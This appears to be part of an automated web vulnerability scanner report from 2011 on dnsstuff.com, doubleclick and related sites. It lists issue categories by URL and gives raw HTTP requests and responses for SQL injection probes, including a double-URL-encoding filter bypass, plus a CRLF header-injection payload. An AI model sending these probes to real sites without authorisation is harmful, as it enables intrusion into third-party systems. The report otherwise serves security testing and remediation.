19.59. http://www.domaintools.com/learn/how-do-i-buy-a--domain-name-currently-owned-by-someone-else-422/

19.60. http://www.domaintools.com/learn/what-is-whois-information-and-why-is-it-valuable-419/

19.61. http://www.domaintools.com/monitor/

19.62. http://www.domaintools.com/monitor/domain-monitor/

19.63. http://www.domaintools.com/monitor/name-server-alert/

19.64. http://www.domaintools.com/monitor/registrant-alert/

19.65. http://www.domaintools.com/monitor/trademark-alert/

19.66. http://www.domaintools.com/research/

19.67. http://www.domaintools.com/research/dns/

19.68. http://www.domaintools.com/research/hosting-history/

19.69. http://www.domaintools.com/research/name-server-report/

19.70. http://www.domaintools.com/research/reverse-ip/

19.71. http://www.domaintools.com/research/reverse-whois/

19.72. http://www.domaintools.com/research/whois-applications/

19.73. http://www.domaintools.com/research/whois-history/

19.74. http://www.domaintools.com/sitemap/

19.75. http://www.verizonwireless.com/b2c/dispatcher

19.76. http://www.verizonwireless.com/b2c/explore/

19.77. http://www.verizonwireless.com/b2c/index.html

19.78. http://www.verizonwireless.com/b2c/shoppingAssistant

19.79. http://www.verizonwireless.com/b2c/store/controller

19.80. http://www.verizonwireless.com/b2c/store/controller

19.81. http://www.verizonwireless.com/b2c/store/controller

19.82. http://www.verizonwireless.com/b2c/store/controller

19.83. http://www.verizonwireless.com/b2c/storelocator/index.jsp

20. File upload functionality

21. TRACE method is enabled

21.1. http://apps.dnsstuff.com/

21.2. http://blog.domaintools.com/

21.3. http://dnsstuff.com/

21.4. http://picasaweb.google.com/

21.5. https://secure.domaintools.com/

21.6. http://support.domaintools.com/

21.7. http://www.dnsstuff.com/

21.8. https://www.dnsstuff.com/

22. Email addresses disclosed

22.1. http://blog.domaintools.com/

22.2. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

22.3. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

22.4. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl

22.5. http://dyn.com/

22.6. http://feed.domaintoolsblog.com/domaintools/

22.7. http://groups.google.com/groups

22.8. http://ibid4216487243.plumd.dnsstuff.com/style.css

22.9. http://images.bestbuy.com/BestBuy_US/store/js/jQuery/plugins/colorbox/colorbox/jquery.colorbox-min.js

22.10. http://jqueryui.com/about

22.11. http://phones.microsoftstore.com/eCommerce/SpecialOffer.aspx

22.12. https://secure.domaintools.com/log-in/

22.13. http://support.dnsstuff.com/KB/a27/how-to-enable-and-configure-internal-message-sniffer.aspx

22.14. http://support.dnsstuff.com/News/1/default-news-item.aspx

22.15. http://support.dnsstuff.com/News/root.aspx

22.16. http://www.dnsstuff.com/partner/dyn/

22.17. http://www.domaintools.com/

22.18. http://www.domaintools.com/composite/code.js

22.19. http://www.domaintools.com/composite/style.css

23. Private IP addresses disclosed

23.1. http://connect.facebook.net/en_US/all.js

23.2. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.3. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/4M_1PP4LZN8.js

23.4. http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/OxZAKD4r3bd.css

23.5. http://www.facebook.com/extern/login_status.php

23.6. http://www.facebook.com/plugins/like.php

24. Robots.txt file

24.1. https://adwords.google.com/um/StartNewLogin

24.2. http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js

24.3. http://blog.domaintools.com/feed/

24.4. http://cbk0.google.com/

24.5. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl

24.6. http://clients1.google.com/generate_204

24.7. https://clients6.google.com/static/proxy.html

24.8. http://code.google.com/apis/maps/terms.html

24.9. http://dnsstuff.com/new-tools-a-upgrades

24.10. http://docs.google.com/

24.11. http://dyn.com/

24.12. http://feed.domaintoolsblog.com/domaintools/

24.13. http://feeds.bbci.co.uk/news/rss.xml

24.14. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab

24.15. http://googleads.g.doubleclick.net/pagead/ads

24.16. http://groups.google.com/groups

24.17. http://gtssldv-crl.geotrust.com/crls/gtssldv.crl

24.18. http://ibid2252027210.peachd.dnsstuff.com/style.css

24.19. http://ibid2252027210.plumd.dnsstuff.com/style.css

24.20. http://jqueryui.com/about

24.21. http://khm0.google.com/kh/v/x3d88/x26

24.22. http://khm1.google.com/kh/v/x3d88/x26

24.23. http://khmdb0.google.com/kh

24.24. http://khmdb1.google.com/kh

24.25. http://mail.google.com/mail/

24.26. http://maps.google.com/maps

24.27. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur

24.28. http://meyerweb.com/eric/tools/css/reset/

24.29. http://mobilebeta.microsoft.com/office/communicatormobile/java/download.aspx

24.30. http://news.bbc.co.uk/2/hi/help/rss/4498287.stm

24.31. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

24.32. http://pagead2.googlesyndication.com/pagead/show_ads.js

24.33. http://partner.domaining.com/link/

24.34. http://picasaweb.google.com/lh/view

24.35. https://plusone.google.com/u/0

24.36. http://safebrowsing.clients.google.com/safebrowsing/downloads

24.37. http://satuit.com/

24.38. https://secure.domaintools.com/log-in/

24.39. http://sites.google.com/

24.40. http://ssl.gstatic.com/gb/js/sem_d8da90aa15552b1b6c43db160e9dbc9c.js

24.41. https://ssl.gstatic.com/gb/js/gcm_b1be572aff2630578d6077ebe3f660a9.js

24.42. http://support.dnsstuff.com/AvatarHandler.ashx

24.43. http://support.domaintools.com/

24.44. http://translate.google.com/translate_t

24.45. http://webcache.googleusercontent.com/search

24.46. http://whois.domaintools.com/

24.47. http://www.dnsstuff.com/images/favicon.ico

24.48. https://www.dnsstuff.com/amember/login.php

24.49. http://www.dnswatch.info/

24.50. http://www.domaining.com/

24.51. http://www.domaintools.com/

24.52. http://www.dyn.com/

24.53. http://www.google-analytics.com/__utm.gif

25. Cacheable HTTPS response

25.1. https://clients6.google.com/static/proxy.html

25.2. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab

26. HTML does not specify charset

26.1. http://cache.vzw.com/scripts/globalnav/blank.html

26.2. http://cgibin.erols.com/favicon.ico

26.3. http://ibid2252027210.peachd.dnsstuff.com/style.css

26.4. http://ibid2252027210.plumd.dnsstuff.com/style.css

26.5. http://ibid4216487243.plumd.dnsstuff.com/style.css

26.6. http://jqueryui.com/about

26.7. http://jqueryui.com/themeroller/

26.8. http://ocsp.entrust.net/

26.9. http://satuit.com/favicon.ico

26.10. http://switch.atdmt.com/iaction/bestbuy_page/v3/catName.Mobile%20Plans/catId.pcmcat203600050025/recognized.Anonymous/language.en/secChannel.0/skuList.9867653%2C9867644%2C9867608%2C9867592%2C9867574%2C9867486/catalyst_id.%5BCS%5Dv1|27121715051D30BA-40000107E02681AE%5BCE%5D/cache.49234257

26.11. http://www.verizonwireless.com/trophy/

27. HTML uses unrecognised charset

28. Content type incorrectly stated

28.1. http://cache.vzw.com/fonts/verizonApex-book-ex.woff

28.2. http://cache.vzw.com/globalnav/globalnavmenu.txt

28.3. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab

28.4. http://ibid2252027210.peachd.dnsstuff.com/style.css

28.5. http://ibid2252027210.plumd.dnsstuff.com/style.css

28.6. http://ibid4216487243.plumd.dnsstuff.com/style.css

28.7. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur

28.8. http://sales.liveperson.net/hcp/html/mTag.js

28.9. http://satuit.com/favicon.ico

28.10. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard

28.11. http://wireless.amazon.com/alohaCartRequest

28.12. http://www.dnsstuff.com/bc-research-analysis

28.13. http://www.dnsstuff.com/bc-track-authenticate

28.14. http://www.dnsstuff.com/company

28.15. http://www.dnsstuff.com/company/about-us

28.16. http://www.dnsstuff.com/company/careers

28.17. http://www.dnsstuff.com/company/connect

28.18. http://www.dnsstuff.com/company/press-page

28.19. http://www.dnsstuff.com/company/support

28.20. http://www.dnsstuff.com/docs/lookup/

28.21. http://www.dnsstuff.com/docs/whois

28.22. http://www.dnsstuff.com/domaindoctor

28.23. http://www.dnsstuff.com/privacy-policy

28.24. http://www.dnsstuff.com/products

28.25. http://www.dnsstuff.com/products/alerts

28.26. http://www.dnsstuff.com/products/alerts/domaindoctor

28.27. http://www.dnsstuff.com/products/alerts/rblalert

28.28. http://www.dnsstuff.com/products/au

28.29. http://www.dnsstuff.com/products/dnsreport

28.30. http://www.dnsstuff.com/products/mstc

28.31. http://www.dnsstuff.com/products/overview

28.32. http://www.dnsstuff.com/products/protools

28.33. http://www.dnsstuff.com/products/resources

28.34. http://www.dnsstuff.com/products/resources/blog

28.35. http://www.dnsstuff.com/products/resources/news

28.36. http://www.dnsstuff.com/products/resources/resources

28.37. http://www.dnsstuff.com/products/resources/solution-briefs

28.38. http://www.dnsstuff.com/sitemap

28.39. http://www.dnsstuff.com/terms-of-use

28.40. http://www.dnsstuff.com/tools

28.41. http://www.dnsstuff.com/tools/

28.42. http://www.dnsstuff.com/tools/aboutyou/

28.43. http://www.dnsstuff.com/tools/tracert/

28.44. http://www.dnsstuff.com/tools/whois/

28.45. http://www.dnsstuff.com/trademarks

28.46. https://www.dnsstuff.com/amember/login.php

28.47. https://www.dnsstuff.com/amember/member.php

28.48. https://www.dnsstuff.com/amember/purchase.php

28.49. https://www.dnsstuff.com/amember/trial.php

28.50. https://www.dnsstuff.com/products/mstc

28.51. https://www.dnsstuff.com/products/protools

28.52. http://www.verizonwireless.com/b2c/devicesController/interface/dwrChangeTermService.js

28.53. http://www.verizonwireless.com/b2c/devicesController/interface/dwrCompareService.js

28.54. http://www.verizonwireless.com/b2c/devicesController/interface/dwrDeviceDetailTabService.js

28.55. http://www.verizonwireless.com/b2c/devicesController/interface/dwrSearchService.js

28.56. http://www.verizonwireless.com/b2c/devicesController/interface/dwrSupportTabService.js

29. Content type is not specified

29.1. http://simplexityllc.tt.omtrdc.net/m2/simplexityllc/mbox/standard

29.2. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard



1. SQL injection
There are 4 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://googleads.g.doubleclick.net/pagead/ads [dt parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The dt parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the dt parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the dt request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-1026799836550757&output=html&h=90&slotname=1466459842&w=728&lmt=1310954320&flash=0&url=http%3A%2F%2Fwww.dnsstuff.com%2Ftools%2Fipall%2F%3Ftool_id%3D67%26token%3D%26toolhandler_redirect%3D0%26ip%3D209.235.10.84&dt=1310954338783%2527&bpp=31&shv=r20110713&jsv=r20110627&correlator=1310954340965&frm=4&adk=502184604&ga_vid=362391004.1310954302&ga_sid=1310954302&ga_hid=2109667182&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=4&u_nmime=36&biw=981&bih=652&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&fu=0&ifi=1&dtd=6443&xpc=aMfwJ5lKdK&p=http%3A//www.dnsstuff.com HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Jul 2011 02:20:49 GMT
Server: cafe
Cache-Control: private
Content-Length: 5426
X-XSS-Protection: 1; mode=block

<html><head><script><!--
(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime();this.t[d]=[f,e]};this.tick("start",null,c)}var g=new a;window.jstiming={Timer:a,lo
...[SNIP]...
"?v=3","&s="+(window.jstiming.sn||"pagead")+"&action=",b.name,j.length?"&it="+j.join(","):"","",f,"&rt=",m.join(",")].join("");a=new Image;var o=window.jstiming.c++;window.jstiming.a[o]=a;a.onload=a.onerror=function(){delete window.jstiming.a[o]};a.src=b;a=null;return b}};var i=window.jstiming.load;function l(b,a){var e=parseInt(b,10);if(e>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-1026799836550757&output=html&h=90&slotname=1466459842&w=728&lmt=1310954320&flash=0&url=http%3A%2F%2Fwww.dnsstuff.com%2Ftools%2Fipall%2F%3Ftool_id%3D67%26token%3D%26toolhandler_redirect%3D0%26ip%3D209.235.10.84&dt=1310954338783%2527%2527&bpp=31&shv=r20110713&jsv=r20110627&correlator=1310954340965&frm=4&adk=502184604&ga_vid=362391004.1310954302&ga_sid=1310954302&ga_hid=2109667182&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=4&u_nmime=36&biw=981&bih=652&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&fu=0&ifi=1&dtd=6443&xpc=aMfwJ5lKdK&p=http%3A//www.dnsstuff.com HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Jul 2011 02:20:51 GMT
Server: cafe
Cache-Control: private
Content-Length: 14221
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#3780c3}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...

1.2. http://googleads.g.doubleclick.net/pagead/ads [ifi parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The ifi parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ifi parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-1026799836550757&output=html&h=90&slotname=1466459842&w=728&lmt=1310954320&flash=0&url=http%3A%2F%2Fwww.dnsstuff.com%2Ftools%2Fipall%2F%3Ftool_id%3D67%26token%3D%26toolhandler_redirect%3D0%26ip%3D209.235.10.84&dt=1310954338783&bpp=31&shv=r20110713&jsv=r20110627&correlator=1310954340965&frm=4&adk=502184604&ga_vid=362391004.1310954302&ga_sid=1310954302&ga_hid=2109667182&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=4&u_nmime=36&biw=981&bih=652&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&fu=0&ifi=1'&dtd=6443&xpc=aMfwJ5lKdK&p=http%3A//www.dnsstuff.com HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Jul 2011 02:52:24 GMT
Server: cafe
Cache-Control: private
Content-Length: 14183
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#3780c3}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
va2VuPSZ0b29saGFuZGxlcl9yZWRpcmVjdD0wJmlwPTIwOS4yMzUuMTAuODSAAgGoAwHIAxc&num=2&sig=AOD64_03toXT7WfAAjyKK1dUd9HdHUgGOw&client=ca-pub-1026799836550757&adurl=http://info.arcsight.com/content/Google-FixThyErrors%3F_kk%3Dlog%2520analyzer%2520software%26_kt%3D78285438-606d-4d0e-9b34-ce1db027b29a" id=aw1 onclick="ha('aw1')" onfocus="ss('','aw1')" onmousedown="st('aw1')" onmouseover="return ss('','aw1')" target=
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-1026799836550757&output=html&h=90&slotname=1466459842&w=728&lmt=1310954320&flash=0&url=http%3A%2F%2Fwww.dnsstuff.com%2Ftools%2Fipall%2F%3Ftool_id%3D67%26token%3D%26toolhandler_redirect%3D0%26ip%3D209.235.10.84&dt=1310954338783&bpp=31&shv=r20110713&jsv=r20110627&correlator=1310954340965&frm=4&adk=502184604&ga_vid=362391004.1310954302&ga_sid=1310954302&ga_hid=2109667182&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=4&u_nmime=36&biw=981&bih=652&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&fu=0&ifi=1''&dtd=6443&xpc=aMfwJ5lKdK&p=http%3A//www.dnsstuff.com HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Jul 2011 02:52:25 GMT
Server: cafe
Cache-Control: private
Content-Length: 13835
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#3780c3}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...

1.3. http://www.dnsstuff.com/l/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dnsstuff.com
Path:   /l/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /l/?partner=dyn HTTP/1.1
Host: www.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.2.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; guid=3b487ce412fcff47f2bec18ba8a3b5dc; ID=f3d6c1ad003861

Response 1

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:03:10 GMT
Server: Apache/2.2.16 (Unix) DAV/2 mod_ssl/2.2.16 OpenSSL/0.9.8e
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 245
Content-Type: text/html; charset=utf-8

BAD CANT QUERY1064You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namo' at line 16

Request 2

GET /l/?partner=dyn HTTP/1.1
Host: www.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.2.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; guid=3b487ce412fcff47f2bec18ba8a3b5dc; ID=f3d6c1ad003861

Response 2

HTTP/1.1 302 Found
Date: Mon, 18 Jul 2011 02:03:11 GMT
Server: Apache/2.2.16 (Unix) DAV/2 mod_ssl/2.2.16 OpenSSL/0.9.8e
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.dnsstuff.com/partner/dyn/
Vary: Accept-Encoding
Content-Length: 1
Content-Type: text/html; charset=utf-8



1.4. http://www.dnsstuff.com/l/ [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dnsstuff.com
Path:   /l/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /l/?partner=dyn HTTP/1.1
Host: www.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13'
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.2.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; guid=3b487ce412fcff47f2bec18ba8a3b5dc; ID=f3d6c1ad003861

Response 1

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:03:07 GMT
Server: Apache/2.2.16 (Unix) DAV/2 mod_ssl/2.2.16 OpenSSL/0.9.8e
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 218
Content-Type: text/html; charset=utf-8

BAD CANT QUERY1064You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'salmon.dnsstuff.com',
'dyn'
)' at line 17

Request 2

GET /l/?partner=dyn HTTP/1.1
Host: www.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13''
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.2.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; guid=3b487ce412fcff47f2bec18ba8a3b5dc; ID=f3d6c1ad003861

Response 2

HTTP/1.1 302 Found
Date: Mon, 18 Jul 2011 02:03:08 GMT
Server: Apache/2.2.16 (Unix) DAV/2 mod_ssl/2.2.16 OpenSSL/0.9.8e
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.dnsstuff.com/partner/dyn/
Vary: Accept-Encoding
Content-Length: 1
Content-Type: text/html; charset=utf-8



2. HTTP header injection

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.bby.pcmcat203600050025/pcmcat203600050025

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 78e59%0d%0a406ba78a9fd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

